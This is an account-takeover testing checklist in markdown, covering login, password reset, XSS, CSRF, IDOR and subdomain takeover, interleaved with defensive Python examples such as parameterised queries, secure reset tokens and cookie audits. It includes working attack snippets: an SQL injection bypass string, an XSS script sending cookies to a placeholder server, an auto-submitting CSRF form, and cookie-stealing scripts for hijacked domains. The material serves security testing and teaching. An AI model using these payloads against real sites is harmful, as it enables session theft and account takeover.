account_takeover_checklist.md
Account Takeover Checklist

  • login:

    • check if you are able to brute force the password

    • Test for OAuth misconfigurations

    • check if you are able to bruteforce the login OTP

    • check for JWT misconfigurations

    • Test for SQL injection to bypass authentication

      admin" or 1=1;--

    • check if the application validates the OTP or Token
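The SQL injection item above lists the classic `or 1=1` bypass. The following is an added example, not part of the checklist, showing why the bypass works and how a parameterised query closes it. It uses an in-memory SQLite table constructed here (one account, password stored as a SHA-256 digest purely for the demonstration; a real system would use a slow password hash), and the payload is written with single quotes to match the way this sample query quotes its string literals.

```python
import hashlib
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample table with a single account (not a real data set)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password_hash TEXT)")
    conn.execute(
        "INSERT INTO users VALUES (?, ?)",
        ("admin", hashlib.sha256(b"correct horse battery staple").hexdigest()),
    )
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """String-built query: quotes in the username rewrite the WHERE clause,
    so a payload such as  admin' or 1=1--  matches every row and the password
    comparison is commented out."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    query = (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND password_hash = '{pw_hash}'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterised query: the driver sends the username as data, so the same
    payload is compared literally against the username column and matches nothing."""
    pw_hash = hashlib.sha256(password.encode()).hexdigest()
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password_hash = ?",
        (username, pw_hash),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "admin' or 1=1--"
    print("vulnerable handler returns:", login_vulnerable(db, payload, "wrong-password"))
    print("parameterised handler returns:", login_safe(db, payload, "wrong-password"))
```

The vulnerable handler returns `admin` for the payload with any password; the parameterised one returns `None` for the payload and only succeeds with the real credentials.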

  • password reset:

    • check if you are able to brute force the password reset OTP

    • test for token predictability

    • test for JWT misconfigurations

    • check if the password reset endpoint is vulnerable to IDOR

    • check if the password reset endpoint is vulnerable to Host Header injection

    • check if the password reset endpoint is leaking the token or OTP in the HTTP response

    • check if the application validates the OTP or Token

    • test for HTTP parameter Pollution (HPP)
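Several of the reset items above (predictable tokens, Host header injection, the token leaking in the HTTP response, and tokens that are never invalidated) come down to how the reset flow issues and redeems its token. The following is an added example, not part of the checklist, of a reset flow written to pass those checks: the token comes from the OS CSPRNG, only its hash is stored, it expires and is single-use, the link is built from a configured base URL instead of the Host header, and the HTTP response is the same whether or not the address exists. The base URL, host allowlist, TTL and user directory are constructed values for the example.

```python
import hashlib
import secrets
import time
from dataclasses import dataclass
from typing import Dict, Optional, Tuple
from urllib.parse import urlencode

# Assumed deployment values (constructed for this example).
RESET_BASE_URL = "https://accounts.example.com"   # fixed in config, never derived from Host
ALLOWED_HOSTS = {"accounts.example.com"}
TOKEN_TTL_SECONDS = 15 * 60
GENERIC_REPLY = "If that address is registered, a reset link has been sent."


@dataclass
class ResetRecord:
    user_id: int
    expires_at: float
    used: bool = False


class ResetTokenStore:
    """Stores only a hash of each token, so a database leak does not yield usable links."""

    def __init__(self) -> None:
        self._records: Dict[str, ResetRecord] = {}

    @staticmethod
    def _hash(token: str) -> str:
        return hashlib.sha256(token.encode()).hexdigest()

    def issue(self, user_id: int, now: Optional[float] = None) -> str:
        now = time.time() if now is None else now
        token = secrets.token_urlsafe(32)   # 256 bits from the OS CSPRNG: not guessable
        self._records[self._hash(token)] = ResetRecord(user_id, now + TOKEN_TTL_SECONDS)
        return token

    def redeem(self, token: str, now: Optional[float] = None) -> Optional[int]:
        """Return the user id for a live token and burn it; None if unknown, used or expired."""
        now = time.time() if now is None else now
        rec = self._records.get(self._hash(token))
        if rec is None or rec.used or now > rec.expires_at:
            return None
        rec.used = True
        return rec.user_id


def build_reset_link(token: str) -> str:
    # Built from the configured base URL, so a forged Host header cannot
    # steer the emailed link to an attacker-controlled domain.
    return f"{RESET_BASE_URL}/reset?{urlencode({'token': token})}"


def request_reset(store, users_by_email, email, host_header, now=None) -> Tuple[str, Optional[str]]:
    """Handle POST /forgot-password. Returns (http_response_body, outbound_email_text or None).

    The token travels only in the e-mail. The HTTP body is identical for known
    and unknown addresses, so it leaks neither the token nor account existence.
    """
    if host_header not in ALLOWED_HOSTS:
        return ("invalid host", None)          # reject rather than reflect an unexpected Host
    user_id = users_by_email.get(email)
    if user_id is None:
        return (GENERIC_REPLY, None)
    token = store.issue(user_id, now)
    return (GENERIC_REPLY, f"Reset your password: {build_reset_link(token)}")


if __name__ == "__main__":
    store = ResetTokenStore()
    users = {"alice@example.com": 7}            # constructed user directory
    body, mail = request_reset(store, users, "alice@example.com", "accounts.example.com")
    print(body)
    print(mail)
    token = mail.rsplit("token=", 1)[1]
    print("first redeem:", store.redeem(token), "second redeem:", store.redeem(token))
```

The `now` parameter exists so that expiry can be exercised deterministically; in production it is left at its default. Rate limiting of the redeem endpoint, which the OTP brute-force item calls for, sits in front of this code rather than inside it.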

  • XSS to Account Takeover

    • if the application does not use an auth token, or you can't access the cookies because of the "HttpOnly" flag, you can obtain the CSRF token and craft a request to change the user's email or password

    • try to exfiltrate the cookies

    • try to exfiltrate the Auth Token

    • if the cookie's "domain" attribute is set, search for XSS in the subdomains and use it to exfiltrate the cookies
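The items above hinge on the session cookie's attributes: `HttpOnly` keeps it out of `document.cookie`, and a `Domain` attribute makes it visible to every subdomain, which is what turns a subdomain XSS into a session theft. The following is an added example, not part of the checklist, that emits a hardened `Set-Cookie` value with the standard library and audits an arbitrary `Set-Cookie` value for the weaknesses the checklist looks for. The cookie name and the sample weak header are constructed for the example.

```python
from http.cookies import SimpleCookie
from typing import List


def build_session_cookie(session_id: str) -> str:
    """Return a Set-Cookie header value for a hardened session cookie.

    HttpOnly: not readable from script, so an XSS cannot read it via document.cookie.
    Secure:   only sent over HTTPS.
    SameSite: not attached to cross-site POSTs, which blunts CSRF.
    No Domain attribute: host-only, so subdomains do not receive it.
    """
    jar = SimpleCookie()
    jar["session"] = session_id
    jar["session"]["httponly"] = True
    jar["session"]["secure"] = True
    jar["session"]["samesite"] = "Lax"
    jar["session"]["path"] = "/"
    return jar.output(header="").strip()


def audit_set_cookie(header_value: str) -> List[str]:
    """Return human-readable findings for one Set-Cookie header value (empty if clean)."""
    parts = [p.strip() for p in header_value.split(";") if p.strip()]
    name = parts[0].split("=", 1)[0]
    attrs = {}
    for part in parts[1:]:
        key, _, value = part.partition("=")
        attrs[key.strip().lower()] = value.strip()

    findings = []
    if "httponly" not in attrs:
        findings.append(f"{name}: missing HttpOnly (readable by injected script)")
    if "secure" not in attrs:
        findings.append(f"{name}: missing Secure (sent over plain HTTP)")
    if attrs.get("samesite", "").lower() in ("", "none"):
        findings.append(f"{name}: SameSite absent or None (attached to cross-site requests)")
    if "domain" in attrs:
        findings.append(f"{name}: Domain={attrs['domain']} shares the cookie with every subdomain")
    return findings


if __name__ == "__main__":
    print("hardened:", build_session_cookie("constructed-session-id"))
    print("findings for hardened cookie:", audit_set_cookie(build_session_cookie("x")))
    # Constructed weak header of the kind the checklist item describes.
    for finding in audit_set_cookie("session=constructed-session-id; Domain=.example.com; Path=/"):
        print("finding:", finding)
```

The audit treats an absent `SameSite` as a finding even though current browsers default it to `Lax`, because the default is not uniform across browser versions and an explicit value is cheap.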

    • PoC Example:

      <script>
          /*
          this script will create a hidden <img> element
          when the browser tries to load the image
          the victim's cookies will be sent to your server
          */

          var new_img = document.createElement('img');
          new_img.src = "http://yourserver/" + document.cookie;
          new_img.style.display = 'none';
          document.body.appendChild(new_img);
      </script>
  • CSRF to Account Takeover

    • check if the email update endpoint is vulnerable to CSRF

    • check if the password change endpoint is vulnerable to CSRF

    • PoC Example:

          <html>
              <head>
                  <title>CSRF PoC</title>
              </head>
              <body>
                  <form name='attack' action='https://example.com/update-email' method='POST'>
                      <input type="hidden" name="new_email" value="[email protected]">
                      <input type="submit" name="submit" value="submit" hidden>
                  </form>
                  <script>
                      document.attack.submit.click()
                  </script>
              </body>
          </html>
  • IDOR to Account Takeover

    • check if the email update endpoint is vulnerable to IDOR

    • check if the password change endpoint is vulnerable to IDOR

    • check if the password reset endpoint is vulnerable to IDOR
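The CSRF and IDOR sections above both target the same endpoints (email update, password change). The following is an added example, not part of the checklist, of an email-update handler written to pass both checks: the target account is taken from the server-side session rather than a `user_id` in the request body (closing the IDOR), and the request must carry an allowed `Origin` and a CSRF token bound to the session by HMAC (closing the CSRF). A deliberately weak handler is kept beside it so the two behaviours can be compared. The `Request` object, session table, server secret and origin allowlist are constructed stand-ins for whatever the web framework provides.

```python
import hashlib
import hmac
import secrets
from dataclasses import dataclass
from typing import Dict, Optional

SERVER_SECRET = secrets.token_bytes(32)   # constructed per process; load from config in practice
ALLOWED_ORIGINS = {"https://example.com"}  # assumed site origin


def issue_csrf_token(session_id: str) -> str:
    """Synchronizer token derived from the session id with HMAC; nothing extra to store."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf_token(session_id: str, presented: Optional[str]) -> bool:
    # compare_digest avoids leaking the correct token through timing differences
    return hmac.compare_digest(issue_csrf_token(session_id), presented or "")


@dataclass
class Request:
    session_id: str                # value of the session cookie
    origin: Optional[str]          # Origin header, None when absent
    form: Dict[str, str]           # POST body fields


class Forbidden(Exception):
    pass


class AccountService:
    def __init__(self) -> None:
        self.sessions: Dict[str, int] = {}   # session_id -> user_id
        self.emails: Dict[int, str] = {}     # user_id -> email

    def update_email_vulnerable(self, req: Request) -> int:
        """Trusts user_id from the body (IDOR) and performs no CSRF check."""
        user_id = int(req.form["user_id"])
        self.emails[user_id] = req.form["new_email"]
        return user_id

    def update_email(self, req: Request) -> int:
        """Hardened handler: identity from the session, origin and token checked."""
        user_id = self.sessions.get(req.session_id)
        if user_id is None:
            raise Forbidden("not logged in")
        # Strict policy: a state-changing POST without an allowed Origin is refused.
        if req.origin not in ALLOWED_ORIGINS:
            raise Forbidden("cross-site or missing Origin")
        if not verify_csrf_token(req.session_id, req.form.get("csrf_token")):
            raise Forbidden("invalid CSRF token")
        # Any user_id field in the body is ignored: the account is the caller's own.
        self.emails[user_id] = req.form["new_email"]
        return user_id


if __name__ == "__main__":
    svc = AccountService()
    svc.sessions["s1"] = 1
    svc.emails.update({1: "alice@example.com", 2: "bob@example.com"})   # constructed accounts
    svc.update_email_vulnerable(Request("s1", None, {"user_id": "2", "new_email": "changed@example.com"}))
    print("vulnerable handler let session s1 rewrite account 2:", svc.emails[2])
    token = issue_csrf_token("s1")
    req = Request("s1", "https://example.com",
                  {"user_id": "2", "new_email": "alice-new@example.com", "csrf_token": token})
    print("hardened handler updated account", svc.update_email(req), "->", svc.emails[1])
```

Browsers send `Origin` on cross-site POSTs, so the origin check alone stops the HTML PoC above; the token check remains for clients and proxies that strip the header, and the session-derived identity is what makes a `user_id` field in the body irrelevant.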

  • subdomain takeover:

    • first-order: check if you can take over xyz.example.com; you can then host any malicious code to steal users' info or cookies
    • PoC Example
      #!/usr/bin/python3
      from flask import Flask, request

      app = Flask(__name__)

      @app.route('/')
      def cookie_sniffer():
          for c_name, c_value in request.cookies.items():
              print(c_name + ': ' + c_value)
          return 'Hello, world'

      if __name__ == '__main__':
          app.run(port=80)
    • second-order (broken link hijacking): if you find a broken link in a webpage (https://nonexistentlink.com/app.js) and you can take over this domain, you can host any malicious JavaScript file and use it to steal users' info or cookies
    • PoC Example
      var user_cookies = {
          "cookies": document.cookie
      }

      var xhttp = new XMLHttpRequest();
      xhttp.open("POST", "/store-cookies", true);
      xhttp.send(JSON.stringify(user_cookies));
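Both subdomain takeover variants above start from an inventory problem on the defending side: DNS records that point at third-party hosts nobody verified are still claimed, and pages that load scripts from domains the site does not control. The following is an added example, not part of the checklist, of a small stdlib-only inventory pass over a zone export and a page's HTML that surfaces exactly those two classes of records for review; it also flags third-party scripts that lack an `integrity` attribute, since Subresource Integrity would stop a hijacked script from executing. The zone records, the first-party domain suffix, the provider host and the sample HTML are constructed for the example; the broken link URL is the one quoted in the checklist.

```python
from html.parser import HTMLParser
from typing import List, Tuple
from urllib.parse import urlparse

FIRST_PARTY_SUFFIXES = ("example.com",)   # assumed: domains the organisation controls

# Constructed zone export: (name, type, target).
SAMPLE_ZONE = [
    ("www.example.com", "A", "192.0.2.10"),
    ("static.example.com", "CNAME", "www.example.com."),
    ("xyz.example.com", "CNAME", "xyz-app.hosting-provider-placeholder.net."),
]

# Constructed page: one first-party script, the broken link from the checklist,
# and a third-party script that does carry an integrity attribute.
SAMPLE_HTML = """
<html><head>
<script src="/static/app.js"></script>
<script src="https://nonexistentlink.com/app.js"></script>
<script src="https://cdn.thirdparty-placeholder.net/lib.js" integrity="sha384-PLACEHOLDER"></script>
</head><body></body></html>
"""


def is_first_party(host: str) -> bool:
    """True when host is one of our domains or a subdomain of one (exact label match)."""
    return any(host == s or host.endswith("." + s) for s in FIRST_PARTY_SUFFIXES)


def find_dangling_cname_candidates(zone) -> List[Tuple[str, str]]:
    """CNAMEs whose target is outside our domains. Each one must be confirmed as
    still provisioned at the provider; an unclaimed target can be registered by anyone."""
    out = []
    for name, rtype, target in zone:
        if rtype.upper() == "CNAME" and not is_first_party(target.rstrip(".")):
            out.append((name, target.rstrip(".")))
    return out


class _ScriptCollector(HTMLParser):
    def __init__(self) -> None:
        super().__init__()
        self.scripts: List[Tuple[str, bool]] = []   # (src, has_integrity)

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = dict(attrs)
        if a.get("src"):
            self.scripts.append((a["src"], bool(a.get("integrity"))))


def find_third_party_scripts(html_text: str) -> List[Tuple[str, bool]]:
    """Absolute script URLs on non-first-party hosts, with whether SRI is present.
    A dead third-party host here is the broken link the second-order item describes."""
    collector = _ScriptCollector()
    collector.feed(html_text)
    out = []
    for src, has_integrity in collector.scripts:
        host = urlparse(src).hostname
        if host and not is_first_party(host):
            out.append((src, has_integrity))
    return out


if __name__ == "__main__":
    for name, target in find_dangling_cname_candidates(SAMPLE_ZONE):
        print(f"verify CNAME {name} -> {target} is still provisioned at the provider")
    for src, sri in find_third_party_scripts(SAMPLE_HTML):
        print(f"third-party script {src}" + ("" if sri else " (no integrity attribute)"))
```

Resolving each flagged CNAME and fetching each flagged script URL is the natural next step, but that requires network access and is left out so the pass runs offline against an export.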